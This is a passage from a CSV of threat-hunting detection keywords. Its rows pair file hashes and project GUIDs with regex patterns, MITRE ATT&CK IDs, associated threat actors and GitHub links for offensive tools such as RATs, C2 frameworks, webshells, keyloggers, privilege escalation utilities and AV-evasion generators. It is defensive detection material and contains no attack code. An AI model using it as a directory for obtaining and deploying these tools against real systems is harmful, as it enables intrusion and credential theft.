Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","31891" "*9CD?F6D5878FC3AECF10761FD72371A2877F270D0*",".{0,1000}9CD\?F6D5878FC3AECF10761FD72371A2877F270D0.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","31892" "*9cd007dd93a195546eec029470211689568df8c877fdc5faef1e03f942097a9b*",".{0,1000}9cd007dd93a195546eec029470211689568df8c877fdc5faef1e03f942097a9b.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","31893" "*9cd7158c53df4734b75aa23abce157d261f37eef1432b741078737cab19fa65c*",".{0,1000}9cd7158c53df4734b75aa23abce157d261f37eef1432b741078737cab19fa65c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31897" 
"*9cd7f22a7d202899c075a524124a9509bc5dffd09ff2e797074e074a1ad48a5c*",".{0,1000}9cd7f22a7d202899c075a524124a9509bc5dffd09ff2e797074e074a1ad48a5c.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","31898" "*9ce11125e29ab3e23d8b619ceb50fdb0eaf36d1602c8b3e69c02dc77a77d7779*",".{0,1000}9ce11125e29ab3e23d8b619ceb50fdb0eaf36d1602c8b3e69c02dc77a77d7779.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31899" "*9ceea502f209095ccb4973a18078869931c6b635540f7315d8eccf75055d6f03*",".{0,1000}9ceea502f209095ccb4973a18078869931c6b635540f7315d8eccf75055d6f03.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31900" "*9cf730bd8182e8ecc74d6f02dc2eba4dc40d1b50effa30941b522010513baeb6*",".{0,1000}9cf730bd8182e8ecc74d6f02dc2eba4dc40d1b50effa30941b522010513baeb6.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & 
Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","31901" "*9CFD5FA4-5AD6-463C-87E5-3F42133B5DA8*",".{0,1000}9CFD5FA4\-5AD6\-463C\-87E5\-3F42133B5DA8.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","31903" "*9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e*",".{0,1000}9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31904" "*9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e*",".{0,1000}9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31905" "*9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e*",".{0,1000}9cfdc7b3004cb67d9d6360ff561cd0c3c2c304fdc6ff651aa8ca1d8f0def0c4e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome 
Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31906" "*9d07db60cd26c5d11f94aa666048b66948004a660ffb03fa7c3414e56f70ae5c*",".{0,1000}9d07db60cd26c5d11f94aa666048b66948004a660ffb03fa7c3414e56f70ae5c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31908" "*9D08025F46B50B02A2B45CC2E6E83F85BC80C4AEEDEB8651E36B38DA29856542*",".{0,1000}9D08025F46B50B02A2B45CC2E6E83F85BC80C4AEEDEB8651E36B38DA29856542.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","31909" "*9d0ff36d92bb6cac9255111b4af63700c5e796fe8233504b4acd1ec4f92bb43f*",".{0,1000}9d0ff36d92bb6cac9255111b4af63700c5e796fe8233504b4acd1ec4f92bb43f.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","#filehash","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","31912" "*9d1292d97f03943a54c41497f4b4e3186dea857a276f76954206e42f848fa30d*",".{0,1000}9d1292d97f03943a54c41497f4b4e3186dea857a276f76954206e42f848fa30d.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege 
escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","31913" "*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*",".{0,1000}9D1B853E\-58F1\-4BA5\-AEFC\-5C221CA30E48.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","#GUIDproject","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","31914" "*9d1c1b19e41b7543be1d209d368bbfec5ca14e413fe1b060354a79dabf29f727*",".{0,1000}9d1c1b19e41b7543be1d209d368bbfec5ca14e413fe1b060354a79dabf29f727.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31915" "*9D1C563E5228B2572F5CA14F0EC33?CA0DEDA3D57*",".{0,1000}9D1C563E5228B2572F5CA14F0EC33\?CA0DEDA3D57.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","31916" "*9D1D39D8-2387-46ED-A4A8-59D250C97F35*",".{0,1000}9D1D39D8\-2387\-46ED\-A4A8\-59D250C97F35.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","31917" "*9d1f61358901da13ce8633966b867195a65b387169e5a019e6983f1d69290c4d*",".{0,1000}9d1f61358901da13ce8633966b867195a65b387169e5a019e6983f1d69290c4d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31918" "*9d21a5677266c6ff348c79d69e7d2908e121bd5c4d841e9cb4eec90d81ceddd3*",".{0,1000}9d21a5677266c6ff348c79d69e7d2908e121bd5c4d841e9cb4eec90d81ceddd3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31920" "*9d251c360046d1bb6a5a0d0e4de7c307b91044aa93a9ce6dc74820a01c5bb745*",".{0,1000}9d251c360046d1bb6a5a0d0e4de7c307b91044aa93a9ce6dc74820a01c5bb745.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31921" "*9d28971b2a831336162f0d303cc1c7400e5876a968f2c6553b46c852ee121504*",".{0,1000}9d28971b2a831336162f0d303cc1c7400e5876a968f2c6553b46c852ee121504.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31922" "*9d31cc4b07fb3b4be9ce62307c24acfcd5f13075723eb621a935d2a98d8e2f35*",".{0,1000}9d31cc4b07fb3b4be9ce62307c24acfcd5f13075723eb621a935d2a98d8e2f35.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31925" "*9d3244ba1396ef5d4f5ee375dfa00971f5e6ed20aa2705c570497c78b9948ea8*",".{0,1000}9d3244ba1396ef5d4f5ee375dfa00971f5e6ed20aa2705c570497c78b9948ea8.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31926" "*9D365106-D7B8-4B5E-82CC-6D6ABCDCA2B8*",".{0,1000}9D365106\-D7B8\-4B5E\-82CC\-6D6ABCDCA2B8.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","#GUIDproject","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","31927" "*9d3cce7420303a3eb892b991506ac45e00118f231a41a539b0425b41ec9188aa*",".{0,1000}9d3cce7420303a3eb892b991506ac45e00118f231a41a539b0425b41ec9188aa.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31929" "*9d3ebfe38c45da2bedc4250b4a5b8dcfe4a6c3505ccfe9a429f39b06a8ecc228*",".{0,1000}9d3ebfe38c45da2bedc4250b4a5b8dcfe4a6c3505ccfe9a429f39b06a8ecc228.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified 
version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","31931" "*9d404660d091df7a8254e54ded6f39ed2b766b7ac4b08969b5b9db472c6a206e*",".{0,1000}9d404660d091df7a8254e54ded6f39ed2b766b7ac4b08969b5b9db472c6a206e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31932" "*9d40e53bd79a33c9124c6d9e89e71c6ad329f180b2e73692daf82846ac1410a7*",".{0,1000}9d40e53bd79a33c9124c6d9e89e71c6ad329f180b2e73692daf82846ac1410a7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31933" "*9d4774352f398cefc5f715559b274007b59768bd6d1684f7a71d3cc2529097c6*",".{0,1000}9d4774352f398cefc5f715559b274007b59768bd6d1684f7a71d3cc2529097c6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31934" "*9d554dae02fa230c3c36b0014f0703b17afdf57a348083472f70688fb44eb912*",".{0,1000}9d554dae02fa230c3c36b0014f0703b17afdf57a348083472f70688fb44eb912.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31936" "*9d571b529b8c97f1d95d00147a98ca6a208446100108993377ef74f7bfab0ced*",".{0,1000}9d571b529b8c97f1d95d00147a98ca6a208446100108993377ef74f7bfab0ced.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31937" "*9d584d6906a84285108c0500cab449e016a42bfd2b365f19ae851ff5312e2a33*",".{0,1000}9d584d6906a84285108c0500cab449e016a42bfd2b365f19ae851ff5312e2a33.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","31938" 
"*9d6afdd06228c999288c7eb473b553b8808587182e6dda734f8fef44ebd1066c*",".{0,1000}9d6afdd06228c999288c7eb473b553b8808587182e6dda734f8fef44ebd1066c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31940" "*9d778c3e1c0e383e85dba64c186e25d953b27fedf500f1e974f66f329bb98faf*",".{0,1000}9d778c3e1c0e383e85dba64c186e25d953b27fedf500f1e974f66f329bb98faf.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31945" "*9d780803519141fc8c14c067688184d7df094190cf74825b6ea6651e7ccd911b*",".{0,1000}9d780803519141fc8c14c067688184d7df094190cf74825b6ea6651e7ccd911b.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31946" "*9d7bfb3aeba4145896ece197216c4269deee6cce93eed3ffafe442ed05aeb4c4*",".{0,1000}9d7bfb3aeba4145896ece197216c4269deee6cce93eed3ffafe442ed05aeb4c4.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","#filehash","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","31947" "*9d847494b219b153345479919af7ca0e11e253c9f782fafeee8f74c63862c8a2*",".{0,1000}9d847494b219b153345479919af7ca0e11e253c9f782fafeee8f74c63862c8a2.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31949" "*9d8990ef035b5e7673e07a0093398642d0fb7f910349228e2c068dcce54127f0*",".{0,1000}9d8990ef035b5e7673e07a0093398642d0fb7f910349228e2c068dcce54127f0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31950" "*9d91266126b654f10b15b28b1852307f73d749b64021db3ec62fea1002bfe621*",".{0,1000}9d91266126b654f10b15b28b1852307f73d749b64021db3ec62fea1002bfe621.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - 
T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31951" "*9da01c8f4125470c56a2d67eea6dff6a15d2b9b9ce084ad42171c85d36ebde6c*",".{0,1000}9da01c8f4125470c56a2d67eea6dff6a15d2b9b9ce084ad42171c85d36ebde6c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31952" "*9da47a94bbb8d9322de8b7bb34958578776a47fdd440d2cca413fec7c78bc795*",".{0,1000}9da47a94bbb8d9322de8b7bb34958578776a47fdd440d2cca413fec7c78bc795.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","31953" "*9da97c98754e746fdc15a562fec6b6c0374007d2bf3b89d53a15e82b409e724d*",".{0,1000}9da97c98754e746fdc15a562fec6b6c0374007d2bf3b89d53a15e82b409e724d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31954" "*9dab89ef77aae50a68e256bf169057ea3083869c80a3caddccbddecc5b4f61f7*",".{0,1000}9dab89ef77aae50a68e256bf169057ea3083869c80a3caddccbddecc5b4f61f7.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - 
TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#filehash","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","31955" "*9db2d93288d2a07ec088c5b123cac2754a0a9ea5221e784eefedf96aca886a17*",".{0,1000}9db2d93288d2a07ec088c5b123cac2754a0a9ea5221e784eefedf96aca886a17.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#filehash","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","31956" "*9db8218a9e3f41f406e9a3e0d23148069275d3a0ec0139e081d9d52ea40d3386*",".{0,1000}9db8218a9e3f41f406e9a3e0d23148069275d3a0ec0139e081d9d52ea40d3386.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31957" "*9dbb7cd0d0bc25a9ead8ef4a6b2635c503a4b1f60b62490abf0a068b1108ebff*",".{0,1000}9dbb7cd0d0bc25a9ead8ef4a6b2635c503a4b1f60b62490abf0a068b1108ebff.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
